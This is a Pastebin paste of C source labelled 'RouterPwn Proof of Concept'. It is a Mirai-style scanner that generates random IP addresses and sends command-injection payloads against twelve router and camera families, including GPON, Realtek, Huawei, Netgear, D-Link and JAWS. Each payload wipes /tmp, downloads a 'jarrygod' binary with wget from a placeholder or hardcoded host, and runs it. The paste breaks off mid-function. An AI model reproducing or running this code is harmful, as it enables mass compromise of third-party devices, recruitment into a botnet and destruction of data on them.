API tools faq
paste
miraip0ts

routerpwn

miraip0ts
Oct 5th, 2018
847
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 29.80 KB | None | 0 0
raw download clone embed print report diff
  1. //RouterPwn Proof of Concept
  2. //Target 12 different router exploits
  3. //Don't forget to edit your payloads
  4.  
  5. #include <stdlib.h>
  6. #include <stdarg.h>
  7. #include <stdio.h>
  8. #include <sys/socket.h>
  9. #include <sys/types.h>
  10. #include <netinet/in.h>
  11. #include <arpa/inet.h>
  12. #include <netdb.h>
  13. #include <signal.h>
  14. #include <strings.h>
  15. #include <string.h>
  16. #include <sys/utsname.h>
  17. #include <unistd.h>
  18. #include <fcntl.h>
  19. #include <errno.h>
  20. #include <netinet/udp.h>
  21. #include <netinet/tcp.h>
  22. #include <sys/wait.h>
  23. #include <sys/ioctl.h>
  24. #include <net/if.h>
  25.  
  26. int GPON1_Range [] = {187,189,200,201,207};
  27. int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};
  28.  
  29. int exploit_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;
  30. static uint8_t ipState[40] = {0};
  31. int max = 0, i = 0;
  32.  
  33. int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests
  34. {  
  35.     struct hostent *hp;
  36.     struct sockaddr_in addr;
  37.     int on = 1, sock;    
  38.     struct timeval timeout;      
  39.     timeout.tv_sec = 3; // 3 sec timeout on socket
  40.     timeout.tv_usec = 0;
  41.     if ((hp = gethostbyname(host)) == NULL) return 0;
  42.     bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  43.     addr.sin_port = htons(port);
  44.     addr.sin_family = AF_INET;
  45.     sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  46.     setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
  47.     if (sock == -1) return 0;
  48.     if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  49.     return sock;
  50. }
  51.  
  52.  
  53. void exploit_socket_gpon8080(unsigned char *host)
  54. {
  55.     scanner3_pid = fork();
  56.    
  57.     if (scanner3_pid > 0 || scanner3_pid == -1)
  58.         return;
  59.  
  60.     int gpon_socket1;
  61.     char gpon_request1[1024];
  62.    
  63.     gpon_socket1 = socket_connect_tcp((char *)host, 8080);
  64.    
  65.     sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");
  66.    
  67.     if (gpon_socket1 != 0)
  68.     {
  69.         write(gpon_socket1, gpon_request1, strlen(gpon_request1));
  70.         usleep(200000);
  71.         close(gpon_socket1);
  72.         printf("[Pwn] Found Exploitable Device %s [GPON] [8080]\n", host);
  73.     }
  74.     exit(0);
  75. }
  76.  
  77. void exploit_socket_gpon80(unsigned char *host)
  78. {
  79.     scanner4_pid = fork();
  80.    
  81.     if (scanner4_pid > 0 || scanner4_pid == -1)
  82.         return;
  83.  
  84.     int gpon_socket2;
  85.     char gpon_request2[1024];
  86.    
  87.     gpon_socket2 = socket_connect_tcp((char *)host, 80);
  88.    
  89.     sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");
  90.    
  91.     if (gpon_socket2 != 0)
  92.     {
  93.         write(gpon_socket2, gpon_request2, strlen(gpon_request2));
  94.         usleep(200000);
  95.         close(gpon_socket2);
  96.         printf("[Pwn] Found Exploitable Device %s [GPON] [80]\n", host);
  97.     }
  98.     exit(0);
  99. }
  100.  
  101. void exploit_socket_realtek(unsigned char *host)
  102. {
  103.     scanner5_pid = fork();
  104.    
  105.     if (scanner5_pid > 0 || scanner5_pid == -1)
  106.         return;
  107.  
  108.     int realtek_socket;
  109.     char realtek_request[1024], realtek_request2[1024];
  110.    
  111.     realtek_socket = socket_connect_tcp((char *)host, 52869);
  112.    
  113.     sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/jarrygod.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  114.     sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x jarrygod.mips;./jarrygod.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  115.    
  116.     if (realtek_socket != 0)
  117.     {
  118.         write(realtek_socket, realtek_request, strlen(realtek_request));
  119.         sleep(5);
  120.         write(realtek_socket, realtek_request2, strlen(realtek_request2));
  121.         usleep(200000);
  122.         close(realtek_socket);
  123.         printf("[Pwn] Found Exploitable Device %s [REALTEK] [52869]\n", host);
  124.     }
  125.     exit(0);
  126. }
  127.  
  128. void exploit_socket_netgear(unsigned char *host)
  129. {
  130.     scanner6_pid = fork();
  131.    
  132.     if (scanner6_pid > 0 || scanner6_pid == -1)
  133.         return;
  134.  
  135.     int netgear_socket, netgear_socket2;
  136.     char netgear_request[1024];
  137.    
  138.     netgear_socket = socket_connect_tcp((char *)host, 8080);
  139.     netgear_socket2 = socket_connect_tcp((char *)host, 80);
  140.    
  141.     sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://0.0.0.0/jarrygod.mips+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n");
  142.  
  143.     if (netgear_socket != 0)
  144.     {
  145.         write(netgear_socket, netgear_request, strlen(netgear_request));
  146.         usleep(200000);
  147.         close(netgear_socket);
  148.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [8080]\n", host);
  149.     }
  150.     if (netgear_socket2 != 0)
  151.     {
  152.         write(netgear_socket2, netgear_request, strlen(netgear_request));
  153.         usleep(200000);
  154.         close(netgear_socket2);
  155.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [80]\n", host);
  156.     }
  157.     exit(0);
  158. }
  159.  
  160. void exploit_socket_huawei(unsigned char *host)
  161. {
  162.     scanner6_pid = fork();
  163.    
  164.     if (scanner6_pid > 0 || scanner6_pid == -1)
  165.         return;
  166.  
  167.     int huawei_socket;
  168.     char huawei_request[1024];
  169.    
  170.     huawei_socket = socket_connect_tcp((char *)host, 37215);
  171.    
  172.     sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 0.0.0.0 -l /tmp/huawei -r /jarrygod.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);
  173.    
  174.     if (huawei_socket != 0)
  175.     {
  176.         write(huawei_socket, huawei_request, strlen(huawei_request));
  177.         usleep(200000);
  178.         close(huawei_socket);
  179.         printf("[Pwn] Found Exploitable Device %s [HUAWEI] [37215]\n", host);
  180.     }
  181.     exit(0);
  182. }
  183.  
  184. void exploit_socket_tr064(unsigned char *host)
  185. {
  186.     scanner7_pid = fork();
  187.    
  188.     if (scanner7_pid > 0 || scanner7_pid == -1)
  189.         return;
  190.  
  191.     int tr064_socket, tr064_socket2;
  192.     char tr064_request[1024], tr064_request2[1024];
  193.    
  194.     tr064_socket = socket_connect_tcp((char *)host, 7574);
  195.     tr064_socket2 = socket_connect_tcp((char *)host, 5555);
  196.    
  197.     sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  198.     sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  199.    
  200.     if (tr064_socket != 0)
  201.     {
  202.         write(tr064_socket, tr064_request, strlen(tr064_request));
  203.         usleep(200000);
  204.         close(tr064_socket);
  205.         printf("[Pwn] Found Exploitable Device %s [TR-064] [7574]\n", host);
  206.     }
  207.     if (tr064_socket2 != 0)
  208.     {
  209.         write(tr064_socket2, tr064_request2, strlen(tr064_request2));
  210.         usleep(200000);
  211.         close(tr064_socket2);
  212.         printf("[Pwn] Found Exploitable Device %s [TR-064] [5555]\n", host);
  213.     }
  214.     exit(0);
  215. }
  216.  
  217. void exploit_socket_hnap(unsigned char *host)
  218. {
  219.     scanner8_pid = fork();
  220.    
  221.     if (scanner8_pid > 0 || scanner8_pid == -1)
  222.         return;
  223.  
  224.     int hnap_socket;
  225.     char hnap_request[1024];
  226.    
  227.     hnap_socket = socket_connect_tcp((char *)host, 80);
  228.    
  229.     sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://0.0.0.0/jarrygod.mips && chmod 777 /tmp/jarrygod.mips/ && /tmp/jarrygod.mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);
  230.  
  231.     if (hnap_socket != 0)
  232.     {
  233.         write(hnap_socket, hnap_request, strlen(hnap_request));
  234.         usleep(200000);
  235.         close(hnap_socket);
  236.         printf("[Pwn] Found Exploitable Device %s [HNAP] [80]\n", host);
  237.     }
  238.     exit(0);
  239. }
  240.  
  241. void exploit_socket_crossweb(unsigned char *host)
  242. {
  243.     scanner9_pid = fork();
  244.    
  245.     if (scanner9_pid > 0 || scanner9_pid == -1)
  246.         return;
  247.  
  248.     int crossweb_socket;
  249.     char crossweb_request[1024];
  250.    
  251.     crossweb_socket = socket_connect_tcp((char *)host, 81);
  252.    
  253.     sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://0.0.0.0/jarrygod.arm7;sh${IFS}/tmp/jarrygod.arm7&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");
  254.  
  255.     if (crossweb_socket != 0)
  256.     {
  257.         write(crossweb_socket, crossweb_request, strlen(crossweb_request));
  258.         usleep(200000);
  259.         close(crossweb_socket);
  260.         printf("[Pwn] Found Exploitable Device %s [CROSSWEB] [81]\n", host);
  261.     }
  262.     exit(0);
  263. }
  264.  
  265. void exploit_socket_jaws(unsigned char *host)
  266. {
  267.     scanner10_pid = fork();
  268.    
  269.     if (scanner10_pid > 0 || scanner10_pid == -1)
  270.         return;
  271.  
  272.     int jaws_socket;
  273.     char jaws_request[1024];
  274.    
  275.     jaws_socket = socket_connect_tcp((char *)host, 80);
  276.    
  277.     sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);
  278.  
  279.     if (jaws_socket != 0)
  280.     {
  281.         write(jaws_socket, jaws_request, strlen(jaws_request));
  282.         usleep(200000);
  283.         close(jaws_socket);
  284.         printf("[Pwn] Found Exploitable Device %s [JAWS] [80]\n", host);
  285.     }
  286.     exit(0);
  287. }
  288.  
  289. void exploit_socket_dlink(unsigned char *host)
  290. {
  291.     scanner11_pid = fork();
  292.    
  293.     if (scanner11_pid > 0 || scanner11_pid == -1)
  294.         return;
  295.  
  296.     int dlink_socket;
  297.     char dlink_request[1024];
  298.    
  299.     dlink_socket = socket_connect_tcp((char *)host, 49152);
  300.    
  301.     sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://0.0.0.0/jarrygod.mips;/tmp/jarrygod.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);
  302.  
  303.     if (dlink_socket != 0)
  304.     {
  305.         write(dlink_socket, dlink_request, strlen(dlink_request));
  306.         usleep(200000);
  307.         close(dlink_socket);
  308.         printf("Pwn] Found Exploitable Device %s [DLINK] [49152]\n", host);
  309.     }
  310.     exit(0);
  311. }
  312.  
  313. void exploit_socket_r7064(unsigned char *host)
  314. {
  315.     scanner12_pid = fork();
  316.    
  317.     if (scanner12_pid > 0 || scanner12_pid == -1)
  318.         return;
  319.  
  320.     int r7064_socket;
  321.     char r7064_request[1024];
  322.    
  323.     r7064_socket = socket_connect_tcp((char *)host, 8443);
  324.    
  325.     sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://0.0.0.0/jarrygod.mips;${IFS}sh${IFS}/var/tmp/jarrygod.mips");
  326.  
  327.     if (r7064_socket != 0)
  328.     {
  329.         write(r7064_socket, r7064_request, strlen(r7064_request));
  330.         usleep(200000);
  331.         close(r7064_socket);
  332.         printf("[Pwn] Found Exploitable Device %s [R7064] [8443]\n", host);
  333.     }
  334.     exit(0);
  335. }
  336.  
  337. void exploit_socket_vacron(unsigned char *host)
  338. {
  339.     scanner13_pid = fork();
  340.    
  341.     if (scanner13_pid > 0 || scanner13_pid == -1)
  342.         return;
  343.  
  344.     int vacron_socket;
  345.     char vacron_request[1024];
  346.    
  347.     vacron_socket = socket_connect_tcp((char *)host, 8080);
  348.    
  349.     sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+varcron");
  350.  
  351.     if (vacron_socket != 0)
  352.     {
  353.         write(vacron_socket, vacron_request, strlen(vacron_request));
  354.         usleep(200000);
  355.         close(vacron_socket);
  356.         printf("Pwn] Found Exploitable Device %s [VACRON] [8080]\n", host);
  357.     }
  358.     exit(0);
  359. }
  360. void GPON8080_IPGen()
  361. {
  362.     char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};
  363.     char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};
  364.    
  365.     srand(time(NULL));
  366.     int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  367.     int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  368.    
  369.     ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];
  370.     ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];
  371.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  372.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  373.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  374.    
  375.     sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  376.     sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  377.     sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  378.    
  379.     exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);
  380. }
  381.  
  382. void GPON80_IPGen()
  383. {
  384.     char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};
  385.     char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};
  386.    
  387.     srand(time(NULL));
  388.     int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  389.     int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  390.    
  391.     ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];
  392.     ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];
  393.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  394.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  395.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  396.    
  397.     sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  398.     sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  399.     sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  400.    
  401.     exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);
  402. }
  403.  
  404. void REALTEK_IPGen()
  405. {  
  406.     char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};
  407.     char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};
  408.  
  409.     srand(time(NULL));
  410.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  411.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  412.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  413.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  414.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  415.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
  416.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  417.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  418.    
  419.     sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  420.     sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  421.     sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  422.     sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  423.     sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  424.    
  425.     exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);
  426.     exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);
  427. }
  428.  
  429. void NETGEAR_IPGen()
  430. {  
  431.     char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};
  432.     char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};
  433.  
  434.     srand(time(NULL));
  435.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  436.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  437.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  438.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  439.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  440.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
